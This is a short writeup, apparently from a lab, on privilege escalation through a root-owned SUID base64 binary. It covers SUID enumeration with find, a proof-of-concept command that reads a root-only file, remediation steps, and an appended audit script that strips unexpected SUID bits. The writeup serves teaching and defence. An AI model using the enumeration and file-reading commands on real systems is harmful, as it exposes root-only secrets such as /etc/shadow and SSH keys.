SUID Misuse: Privilege Escalation via `base64`
Overview
Set-UID (SUID) allows a program to run with the privileges of its owner rather than those of the user who invokes it. If a root-owned binary that can read arbitrary files is marked SUID, it becomes a privilege escalation vector: any local user can invoke it to read files that are otherwise readable only by root.
Description
A root-owned SUID base64 binary allows any local user to read root-only files.
Impact
Any local user can read sensitive files such as /etc/shadow, SSH keys, and secrets, leading to full compromise.
Root Cause
The binary /usr/bin/base64 was incorrectly marked SUID.
Proof of Concept
Root creates a protected file
root@bs:~# ls -la /usr/share/secrets.txt
-r-------- 1 root root 30 Jan 7 20:27 /usr/share/secrets.txt
Low-privileged user
root@bs:~# id user135
uid=1001(user135) gid=1003(user135) groups=1003(user135)
Attempt to read the file
user135@bs:~$ cat /usr/share/secrets.txt
cat: /usr/share/secrets.txt: Permission denied
Attacker enumerates SUID binaries
user135@bs:~$ find / -perm -4000 -type f \
! -path "/snap/*" \
! -path "/usr/lib/snapd/*" 2>/dev/null
Output:
/usr/bin/mount
/usr/bin/base64 # <-- the vulnerability
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/su
/usr/bin/sudo
Exploitation:
user135@bs:~$ base64 /usr/share/secrets.txt | base64 -d
Ohh... you hacked my secrets!
Remediations
- Remove the SUID bit from base64: `sudo chmod u-s /usr/bin/base64`
- Audit for other dangerous SUID binaries.
- Remove SUID from any utility capable of reading or executing arbitrary files.
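As an added, defender-side example (not part of the original writeup), the following POSIX shell script turns the enumeration and remediation steps above into an audit: it compares `find -perm -4000` output against an expected baseline and strips the bit from anything unexpected. The baseline list (constructed from the PoC output minus base64), the function names and the `audit_dir` helper are assumptions made for this illustration; a real host's expected SUID set will differ.

```shell
#!/bin/sh
# Added example, not code from the original writeup. Audits SUID binaries
# against an expected baseline and removes the bit from unexpected ones.
set -u

# Expected SUID binaries, one per line. Constructed for this example from the
# PoC output above with base64 left out; adjust for the host being audited.
SUID_BASELINE="/usr/bin/mount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/su
/usr/bin/sudo"

# list_suid DIR: print regular files under DIR that carry the SUID bit.
list_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null
}

# unexpected_suid: read SUID paths on stdin, print those not in the baseline.
unexpected_suid() {
    while IFS= read -r path; do
        [ -z "$path" ] && continue
        if ! printf '%s\n' "$SUID_BASELINE" | grep -qx -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# is_suid FILE: succeed (exit 0) if FILE has the SUID bit set.
is_suid() {
    [ -n "$(find "$1" -type f -perm -4000 2>/dev/null)" ]
}

# strip_suid FILE: the remediation from the writeup (chmod u-s), then verify.
strip_suid() {
    chmod u-s "$1" && ! is_suid "$1"
}

# audit_dir DIR: report every unexpected SUID file under DIR and remediate it.
audit_dir() {
    list_suid "$1" | unexpected_suid | while IFS= read -r path; do
        printf 'unexpected SUID bit: %s\n' "$path"
        strip_suid "$path" && printf 'stripped: %s\n' "$path"
    done
}
```

Run `audit_dir /usr/bin` as root to check a real system; on the host from the PoC it would report and strip `/usr/bin/base64` while leaving the baseline binaries alone.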